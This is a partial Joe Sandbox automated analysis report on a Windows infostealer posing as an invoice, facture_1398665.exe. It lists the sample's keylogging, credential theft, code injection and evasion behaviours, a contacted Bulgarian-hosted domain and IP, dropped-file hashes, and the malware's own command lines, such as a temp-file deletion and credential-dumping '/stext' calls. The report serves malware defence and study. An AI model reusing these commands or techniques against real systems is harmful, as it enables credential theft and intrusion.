automated malware analysis report for facture 1398665.exe ...contains functionality to adjust token...
TRANSCRIPT
ID: 549628Sample Name:facture_1398665.exeCookbook:frenchkeyboardlayout.jbsTime: 14:48:31Date: 07/05/2018Version: 21.0.0
2444455566666667778888899999999
101010101010101011113333333334343434343434353636363737
373737616161616165848484858585858585
Table of Contents
Table of ContentsAnalysis Report
OverviewGeneral InformationDetectionConfidenceClassificationAnalysis AdviceSignature Overview
Key, Mouse, Clipboard, Microphone and Screen Capturing:Networking:Boot Survival:Stealing of Sensitive Information:Persistence and Installation Behavior:Data Obfuscation:Spreading:System Summary:HIPS / PFW / Operating System Protection Evasion:Anti Debugging:Malware Analysis System Evasion:Hooking and other Techniques for Hiding and Protection:Lowering of HIPS / PFW / Operating System Security Settings:Language, Device and Operating System Detection:
Behavior GraphSimulations
Behavior and APIsAntivirus Detection
Initial SampleDropped FilesUnpacked PE FilesDomainsURLs
Yara OverviewInitial SamplePCAP (Network Traffic)Dropped FilesMemory DumpsUnpacked PEs
ScreenshotsStartupCreated / dropped FilesContacted Domains/Contacted IPs
Contacted DomainsContacted IPsPublicPrivate
Static File InfoGeneralFile IconStatic PE Info
GeneralEntrypoint PreviewData DirectoriesSectionsResourcesImportsVersion InfosPossible Origin
Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTP Request Dependency GraphHTTPS PacketsHTTPS Proxied Packets
Code ManipulationsStatistics
BehaviorSystem Behavior
Analysis Process: facture_1398665.exe PID: 3792 Parent PID: 3020GeneralFile Activities
File CreatedFile Deleted
Copyright Joe Security LLC 2018 Page 2 of 149
8586
868686869091
115115115115115
116119143
144144144
144
144144144
144144144145
145146
146146146
146146146
147147147147147147
147147147148
148148149
149
149149
149149
File WrittenFile Read
Analysis Process: facture_1398665.tmp PID: 3824 Parent PID: 3792GeneralFile Activities
File CreatedFile MovedFile WrittenFile Read
Registry ActivitiesAnalysis Process: firefox.exe PID: 3844 Parent PID: 3824
GeneralFile Activities
File CreatedFile WrittenFile Read
Analysis Process: firefox.exe PID: 3948 Parent PID: 3844GeneralFile Activities
File Read
Analysis Process: firefox.exe PID: 3964 Parent PID: 1376GeneralFile Activities
File CreatedFile DeletedFile WrittenFile Read
Registry ActivitiesKey Value Created
Analysis Process: dllhost.exe PID: 2032 Parent PID: 3964GeneralFile Activities
File CreatedFile DeletedFile Read
Registry ActivitiesAnalysis Process: cmd.exe PID: 1036 Parent PID: 2032
GeneralAnalysis Process: msiexec.exe PID: 1916 Parent PID: 2032
GeneralFile Activities
File CreatedFile DeletedFile WrittenFile Read
Analysis Process: msiexec.exe PID: 2224 Parent PID: 2032GeneralFile Activities
File Read
Analysis Process: explorer.exe PID: 1376 Parent PID: 2032General
DisassemblyCode Analysis
Copyright Joe Security LLC 2018 Page 3 of 149
Analysis ReportOverview
General Information
Joe Sandbox Version: 21.0.0
Analysis ID: 549628
Start time: 14:48:31
Joe Sandbox Product: Cloud
Start date: 07.05.2018
Overall analysis duration: 0h 24m 2s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: facture_1398665.exe
Cookbook file name: frenchkeyboardlayout.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies HCA enabledEGA enabledGSI enabled (VBA)GSI enabled (Javascript)GSI enabled (Java)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.phis.spyw.troj.winEXE@17/110@2/1
HCA Information: Successful, ratio: 88%Number of executed functions: 0Number of non-executed functions: 0
EGA Information: Successful, ratio: 100%
Cookbook Comments: Adjust boot timeCorrecting counters for adjusted boot timeSet French Keyboard Layout (default)Found application associated with file extension: .exe
Warnings:
Detection
Strategy Score Range Reporting Detection
Threshold 100 0 - 100 Report FP / FN
Exclude process from analysis (whitelisted): sppsvc.exe, conhost.exe, WMIADAP.exe, dllhost.exeReport creation exceeded maximum time and may have missing disassembly code information.Report size exceeded maximum capacity and may have missing behavior information.Report size exceeded maximum capacity and may have missing disassembly code.Report size getting too big, too many NtDeviceIoControlFile calls found.Report size getting too big, too many NtOpenKeyEx calls found.Report size getting too big, too many NtQueryValueKey calls found.
Show All
Copyright Joe Security LLC 2018 Page 4 of 149
Confidence
Strategy Score Range Further Analysis Required? Confidence
Threshold 5 0 - 5 false
Analysis Advice
Contains functionality to modify the execution of threads in other processes
Ransomware
Spreading
Phishing
Banker
Trojan / Bot
Adware
Spyware
Exploiter
Evader
Miner
clean
clean
clean
clean
clean
clean
clean
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
malicious
malicious
malicious
malicious
malicious
malicious
malicious
Classification
Copyright Joe Security LLC 2018 Page 5 of 149
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Signature Overview
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• Networking
• Boot Survival
• Stealing of Sensitive Information
• Persistence and Installation Behavior
• Data Obfuscation
• Spreading
• System Summary
• HIPS / PFW / Operating System Protection Evasion
• Anti Debugging
• Malware Analysis System Evasion
• Hooking and other Techniques for Hiding and Protection
• Lowering of HIPS / PFW / Operating System Security Settings
• Language, Device and Operating System Detection
Click to jump to signature section
Key, Mouse, Clipboard, Microphone and Screen Capturing:
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Networking:
HTTP GET or POST without a user agent
Contains functionality to download additional files from the internet
Found strings which match to known social media urls
Performs DNS lookups
Posts data to webserver
Urls found in memory or binary data
Uses HTTPS
Boot Survival:
Creates a start menu entry (Start Menu\Programs\Startup)
Stores files to the Windows start menu directory
Stealing of Sensitive Information:
Searches for Windows Mail specific files
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Persistence and Installation Behavior:
Installs new ROOT certificates
Drops PE files
Data Obfuscation:
Contains functionality to dynamically determine API calls
Uses code obfuscation techniques (call, push, ret)Copyright Joe Security LLC 2018 Page 6 of 149
Spreading:
Enumerates the file system
Contains functionality to enumerate / list files inside a directory
System Summary:
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to shutdown / reboot the system
Creates mutexes
Detected potential crypto function
Found potential string decryption / allocating functions
PE file contains executable resources (Code or Archives)
PE file contains strange resources
PE file does not import any functions
Reads the hosts file
Sample file is different than original file name gathered from version info
Sample reads its own file content
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)
Classification label
Contains functionality for error logging
Contains functionality to adjust token privileges (e.g. debug / backup)
Contains functionality to check free disk space
Contains functionality to instantiate COM classes
Contains functionality to load and extract PE file embedded resources
Creates files inside the user directory
Creates temporary files
Found command line output
Parts of this applications are using Borland Delphi (Probably coded in Delphi)
Queries a list of all open handles
Reads ini files
Reads software policies
Reads the Windows registered organization settings
Spawns processes
Uses an in-process (OLE) Automation server
Reads the Windows registered owner settings
Executable creates window controls seldom found in malware
Found graphical window changes (likely an installer)
Checks if Microsoft Office is installed
Submission file is bigger than most known malware samples
Uses new MSVCR Dlls
Contains modern PE file flags such as dynamic base (ASLR) or NX
Binary contains paths to debug symbols
HIPS / PFW / Operating System Protection Evasion:
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Writes to foreign memory regions
Copyright Joe Security LLC 2018 Page 7 of 149
Contains functionality to launch a program with higher privileges
Creates a process in suspended mode (likely to inject code)
Contains functionality to add an ACL to a security descriptor
Contains functionality to create a new security descriptor
May try to detect the Windows Explorer process (often used for injection)
Anti Debugging:
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to register its own exception handler
Malware Analysis System Evasion:
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks the free space of harddrives
Contains long sleeps (>= 3 min)
Enumerates the file system
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Contains functionality to enumerate / list files inside a directory
Contains functionality to query system information
Program exit points
Queries a list of all running processes
Hooking and other Techniques for Hiding and Protection:
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Extensive use of GetProcAddress (often used to hide API calls)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Stores large binary data to the registry
Disables application error messsages (SetErrorMode)
Lowering of HIPS / PFW / Operating System Security Settings:
Modifies Internet Explorer zone settings
Language, Device and Operating System Detection:
Contains functionality locales information (e.g. system language)
Contains functionality to query CPU information (cpuid)
Queries the volume information (name, serial number etc) of a device
Contains functionality to create pipes for IPC
Contains functionality to query local / system time
Contains functionality to query the account / user name
Contains functionality to query time zone information
Contains functionality to query windows version
Queries the cryptographic machine GUID
Copyright Joe Security LLC 2018 Page 8 of 149
Behavior Graph
ID: 549628
Sample: facture_1398665.exe
Startdate: 07/05/2018
Architecture: WINDOWS
Score: 100
firefox.exe
9 12
started
facture_1398665.exe
2
started
truand-2-la-galere.money
91.92.137.74, 443, 49162, 49164RT-ELECTRONICS-2015GazInvestProektltdBG
Bulgaria
Installs new ROOT certificates Modifies Internet Explorerzone settings
Tries to harvest andsteal browser information
(history, passwords,etc)
3 other signatures
dllhost.exe
15
started C:\Users\user~1\...\facture_1398665.tmp, PE32
dropped
facture_1398665.tmp
5 58
started
Changes memory attributesin foreign processes
to executable or writableInjects code into the
Windows Explorer (explorer.exe)Writes to foreign memory
regions 4 other signatures
msiexec.exe
started
msiexec.exe
1
started
cmd.exe
started
explorer.exe
injected
C:\Users\user~1\AppData\...\is-VQCNU.tmp, PE32
dropped
C:\Users\user~1\AppData\...\is-UPNUP.tmp, PE32
dropped
C:\Users\user~1\AppData\...\is-UJ2Q7.tmp, PE32
dropped
44 other files (none is malicious)
dropped
firefox.exe
57
started
Tries to steal InstantMessenger accounts or
passwords
Tries to steal Mailcredentials (via file
access)Searches for Windows
Mail specific files
Tries to harvest andsteal browser information
(history, passwords,etc)
C:\Users\user\AppData\Roaming\...\firefox.exe, PE32
dropped
C:\Users\user\AppData\...\vcruntime140.dll, PE32
dropped
C:\Users\user\AppData\...\ucrtbase.dll, PE32
dropped
44 other files (none is malicious)
dropped
firefox.exe
started
Found evasive API chain(may stop execution
after reading informationin the PEB, e.g. number
of processors)
Contains functionalityto inject threads inother processes
Legend:
Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Hide Legend
Time Type Description
14:49:22 API Interceptor 1x Sleep call for process: facture_1398665.tmp modified
14:49:26 API Interceptor 182x Sleep call for process: firefox.exe modified
14:49:26 Autostart Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F48A04623C4E0000.lnk
14:49:33 API Interceptor 1x Sleep call for process: facture_1398665.exe modified
14:49:48 API Interceptor 56x Sleep call for process: dllhost.exe modified
14:50:15 API Interceptor 505x Sleep call for process: explorer.exe modified
14:50:21 API Interceptor 4x Sleep call for process: msiexec.exe modified
No Antivirus matches
No Antivirus matches
No Antivirus matches
Behavior Graph
Simulations
Behavior and APIs
Antivirus Detection
Initial Sample
Dropped Files
Unpacked PE Files
DomainsCopyright Joe Security LLC 2018 Page 9 of 149
No Antivirus matches
No Antivirus matches
No yara matches
No yara matches
No yara matches
No yara matches
No yara matches
URLs
Yara Overview
Initial Sample
PCAP (Network Traffic)
Dropped Files
Memory Dumps
Unpacked PEs
Screenshots
Copyright Joe Security LLC 2018 Page 10 of 149
System is w7_1facture_1398665.exe (PID: 3792 cmdline: 'C:\Users\user\Desktop\facture_1398665.exe' MD5: FE1214A06FFC40B1EBB524F185894487)
facture_1398665.tmp (PID: 3824 cmdline: 'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe' MD5: 9AE8DFC6C5CB2222DBD09F1176058373)
firefox.exe (PID: 3844 cmdline: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe MD5: 52FFABA4273678BAE75442F2BC85B470)firefox.exe (PID: 3948 cmdline: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe MD5: 52FFABA4273678BAE75442F2BC85B470)
firefox.exe (PID: 3964 cmdline: 'C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe' MD5: 52FFABA4273678BAE75442F2BC85B470)dllhost.exe (PID: 2032 cmdline: C:\Windows\system32\dllhost.exe MD5: A63DC5C2EA944E6657203E0C8EDEAF61)
cmd.exe (PID: 1036 cmdline: cmd.exe /c del /f /q %temp%\gif* MD5: AD7B9C14083B52BC532FBA5948342B98)msiexec.exe (PID: 1916 cmdline: '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp' MD5: 4315D6ECAE85024A0567DF2CB253B7B0)msiexec.exe (PID: 2224 cmdline: '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp' MD5: 4315D6ECAE85024A0567DF2CB253B7B0)explorer.exe (PID: 1376 cmdline: C:\Windows\Explorer.EXE MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
cleanup
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
File Type: ASCII text, with no line terminators
Size (bytes): 49
Entropy (8bit): 4.614310864346762
Encrypted: false
MD5: 8B02B5CEAE137A2D1E66D1B6823368EF
SHA1: 099B0296F551CEA02FACF04F190118270AE39E69
SHA-256: 5BF5808D5C915C8BD4AC1859F98C7341E4992DEB77F5C78A0A8B16ECEAAE9AFC
Startup
Created / dropped Files
Copyright Joe Security LLC 2018 Page 11 of 149
SHA-512: 7184399DA42019E6B111405BA8C699151FE08D204C1F1E4BA5E039B1293374E1E895FAF12FF01647FCB57ADC0366AF0595E2E975211D31E82298E12E9462FA69
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000
C:\Users\user~1\AppData\Local\Temp\F48A04623C4E000032Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
File Type: data
Size (bytes): 517120
Entropy (8bit): 7.534971322819302
Encrypted: false
MD5: 1E6B6C72E08A4ABA036F413C73707502
SHA1: 03EAE9400073369E14A741774AD556CC71094DD7
SHA-256: 6CD510212E0E373C340C3DB475101E68AF14EEF360F2D26DDF6B62551F3DFAC6
SHA-512: 5E4CED43E6856C18FABBC2FAF93107735B320734A233FE72E6C39F45B649B45853965CE286F4809C2935811CF9C5CC60C1D82F22779AF80B7F79E3D9BF846540
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\_pE740.tmpProcess: C:\Windows\System32\msiexec.exe
File Type: Little-endian UTF-16 Unicode text, with no line terminators
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmpProcess: C:\Windows\System32\msiexec.exe
File Type: data
Size (bytes): 21037056
Entropy (8bit): 0.9035146051395809
Encrypted: false
MD5: 5A16B4673BDC7584EF393926ADAD7FBD
SHA1: E54E45F7A5F18FBBAD3A3FFD10D64989D20F529E
SHA-256: 4B9722A9687B341559CD11F43797B4CAB2DAF49408DB220B6A629760CFCFE24C
SHA-512: 11EE50527616D4B99C8E9F676C743CC7C4DB8A623FAC65A27225BE4C2FE47C3496724F4D2CBD57DB204EFA80E839D1C3F6586F3F8215E3EDCBE42ED4C9D2D159
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 21696
Entropy (8bit): 7.0116845824999805
Encrypted: false
MD5: 6B937FE1EFF0E440B124BBB9334DF34D
SHA1: AB3982AB9D46BAA67B1D59728BC6E93C45872B2B
SHA-256: 71C87C14BC1BD0B20D9F68D4943E93C4C6DDC1B6CF252938BB15FE562552F93E
SHA-512: 13D58EACBAC1D97F780BDF87A29CEEA047F6AC1002C6D79FC661FE7AA759C654BA14842D840887B41C48A15E06ED8358FC1A7E124DD6123D2145F1254364B82F
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18112
Entropy (8bit): 7.106107140155806
Encrypted: false
MD5: EA4AE42721460002DC31515F295AD1C4
SHA1: 8A970D589AA4C178083EE8FB65798A6DDECDC1CF
Copyright Joe Security LLC 2018 Page 12 of 149
SHA-256: 668F91E94E76DB4457184909E6A1AB4655E81A8EF37DC37B4ECFE93146C29A88
SHA-512: 5EA1F2FB8BE9FFDF80250B47A440DDB3A41E46A8CE73B6F4834E59CB8D30A1B474F6A33D716EFA43AC7EE52D37AC941F3D51021792B9D1439C831B8A368781B9
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 83784
Entropy (8bit): 6.845861669519175
Encrypted: false
MD5: A2523EA6950E248CBDF18C9EA1A844F6
SHA1: 549C8C2A96605F90D79A872BE73EFB5D40965444
SHA-256: 6823B98C3E922490A2F97F54862D32193900077E49F0360522B19E06E6DA24B4
SHA-512: 2141C041B6BDBEE9EC10088B9D47DF02BF72143EB3619E8652296D617EFD77697F4DC8727D11998695768843B4E94A47B1AED2C6FB9F097FFC8A42CA7AAAF66A
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 17600
Entropy (8bit): 7.186846642215803
Encrypted: false
MD5: A616102234EC5AB394FF1C77DA34F6C0
SHA1: 51E54AAFF7F4902B40E657F31775E50000F8240A
SHA-256: 619E5120BFDD11461672CE8798DA00166E57C528B9AFD80404D2C9CBE87E2C07
SHA-512: C360C045D7CCC3D61FFDF35C3253D7F9C59A759A2EE1583519405D2751C12BACC7B26FA383EB53A0156797905F16F26E28293944A0CA31955E03CC07412F822C
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.096735184430082
Encrypted: false
MD5: 536F07C04C316AAC61AB64A492ED9191
SHA1: 0A2F45D0BA54C4FB5DECBB111BBCC9088FC3269E
SHA-256: 50BF87DA10AE3F442C457E42D6666993B0FCA7C5D4DF521E8CD0959995FBCDDC
SHA-512: B0EC28B75761494A6121C56811DABC297B8E1EA1D56EE4B06A4488D36C16BD26015F2CE945BF9F74B455864828D321AF5DD8B66F839A047458A98984B9343819
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18104
Entropy (8bit): 7.131532401171639
Encrypted: false
MD5: 9A4FC3727AAF02C3285B47DF5EE56244
SHA1: F88E1EA0BA66D1615D7E1D53C95D8E8DBE6BEBE0
SHA-256: 891CCFEB349116283326262C27B8894B43CDC89B8AFD5BA7D21B891814A68075
SHA-512: 3025CCF26BAB11AEC6476C8091968EA040BB37BD9244F6F9DD4AF0FB79D543266420876A64A9FDCDEEA0BB10932E416EF6909D6ECBAF6577D7AE86F17A71E4B9
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes): 133072
Entropy (8bit): 6.814709386830881
Encrypted: false
MD5: E2F7B050C6C83505611807E81DB58E16
Copyright Joe Security LLC 2018 Page 13 of 149
SHA1: A06A6FD60486E8B27E926F30B7D20FC7B2354EED
SHA-256: 9019976DF7D3423DCCEFF61397360BB300F693A1BF98E5BFD33AD3FBEADD24D8
SHA-512: EFB432A1389136A9F87B8834B9C78C1BAF953B84D338621E4841376D03B0A31D1F92186786C3CD8FB390A25A2ED77A2C0F1E3C49F73C57994EF684E552969407
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 20160
Entropy (8bit): 7.045772919081531
Encrypted: false
MD5: A0DFBD2A68A979D1152E2B9153BB497B
SHA1: 9BE79E52750719AD7B014F803CCF1C8D04C932DE
SHA-256: BFF7EA28E198C7DBEE45D35FD98AE03696E9E252D46BEC9FF7B7823CBA1681F1
SHA-512: 238239FFC9034618DEC8161E15CBDD3B727F1615EF057193C95CED158DD42D876398CFC4854CB790B9DF0EA999F53A980D475ED4827335880D2A47CEA10BD7B5
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Size (bytes): 875472
Entropy (8bit): 6.9224404430053434
Encrypted: false
MD5: 4BA25D2CBE1587A841DCFB8C8C4A6EA6
SHA1: 52693D4B5E0B55A929099B680348C3932F2C3C62
SHA-256: B30160E759115E24425B9BCDF606EF6EBCE4657487525EDE7F1AC40B90FF7E49
SHA-512: 82E86EC67A5C6CDDF2230872F66560F4B0C3E4C1BB672507BBB8446A8D6F62512CBD0475FE23B619DB3A67BB870F4F742761CF1F87D50DB7F14076F54006F6C6
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 917184
Entropy (8bit): 6.825553978446455
Encrypted: false
MD5: D2C5233317767EE9329F470C39B046B1
SHA1: 42493597D3DED76DAA9A3C5CAD5D4343958D0D55
SHA-256: F085B1B009AB89049BA95DD4FFDE276D5B1F6FA0055F58DC3FC0D4B03AE8116D
SHA-512: 930B31042B5DDC507D4810C10677DB9786B8A16AD8A3ED09BA0A6256DDDC9C2706D1957ABBE3071D09C8CDCC2F142914AE7F7B727DC3E9F8DD7D821D118B715A
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18104
Entropy (8bit): 7.190985597083441
Encrypted: false
MD5: 13BBF7740AFC464172B00F9638BC4F81
SHA1: A92D84A10B161342FCF0E51AD1C287F9B8890525
SHA-256: FF482F69F2183B5FD3C1B45D9006156524B8F8A5F518E33D6E92EA079787E64D
SHA-512: F572E67384EF07790AAAEC8C8E5CAB6C4E9ED954CAF95033CB31121185780A9CD74A5AB123F744F1AE7F889D8DFC9F8AA3BE70999224FD6A1A37FF27BD8AB0D0
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.127398472524706
Encrypted: false
Copyright Joe Security LLC 2018 Page 14 of 149
MD5: F7AF6BB63229721005C8AC85DC86F5C2
SHA1: 35DDD88FBEA433A7E934AB0CA64907F8B0A85D9A
SHA-256: FA10F7E2AB54C2EBCD4688E39BC4AF1544FA21B73BE7FD0562B3FF7CFF041F7A
SHA-512: E4F242EC6204DD481EA5B8B1EDBFB9A7C8B136D9869FB85868325B21248AA170FECDF43075361E188B20A6F138F3760226B4CFB302929E04CD3901E6CB03961A
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmp
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 24256
Entropy (8bit): 6.86072682024164
Encrypted: false
MD5: D67520BFF673CAB4B2ED1AF12DE37A1F
SHA1: 752DEACC54982012852E68C37253E95B8BB89AEE
SHA-256: 44BBB2AEC747E1CBC63FC7C4D2E8C5EC1CA9F9D026835AC2CCB0D60971B6107A
SHA-512: A960EC529E6889B0F3253869FC72C4F65615141D23F42D808DE99E192B89B15DBC24B1D37812DC89F68576662173F18BC047A46B92598567E8C7E37E51821AB0
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 440120
Entropy (8bit): 6.655941426443587
Encrypted: false
MD5: D25C3FF7A4CBBFFC7C9FFF4F659051CE
SHA1: 02FE8D84D7F74C2721FF47D72A6916028C8F2E8A
SHA-256: 9C1DC36D319382E1501CDEAAE36BAD5B820EA84393EF6149E377D2FB2FC361A5
SHA-512: 945FE55B43326C95F1EEE643D46A53B69A463A88BD149F90E9E193D71B84F4875455D37FD4F06C1307BB2CDBE99C1F6E18CB33C0B8679CD11FEA820D7E728065
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18112
Entropy (8bit): 7.133848449054411
Encrypted: false
MD5: 4C745DC13735B4822FF160CB18B61E22
SHA1: CDC23598548A2F1CBF9AC2BA1003B6D6AF0471D0
SHA-256: 550D4FC902F25F2A0C09F475B5CECEE43FB3A0A042126479560B0001DB5C4891
SHA-512: C4AC87FCD7F2130651C69D939929C013E663EB14502452808AB887A735F3DE34EF28E9C98491C3D427B936D3E53C2840F3195ED6EE62D10730DA29267D78149B
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 72896
Entropy (8bit): 5.834415075746363
Encrypted: false
MD5: BF090F2290C18F96FD359A6596EA4233
SHA1: BA1FD71AEFFB0E9629CF0DDC5D5E4704627FB0E5
SHA-256: 5710E3ED5819CCAA9CF558AB57534BC880C610C06F2A44ADFAFBFAB5BFC38C2B
SHA-512: 01B3D02B6FB7B6ED7302903D8E2937372A5BA582755CCD73D4FAE2B904F278BD4F38C3C2B0CC12F7DA8AC4DBE204976CFB492D8AFE7497F39B800ADC652BAC64
Malicious: false
Reputation: low
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmpProcess: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
Size (bytes): 18624
Entropy (8bit): 7.107805652186164
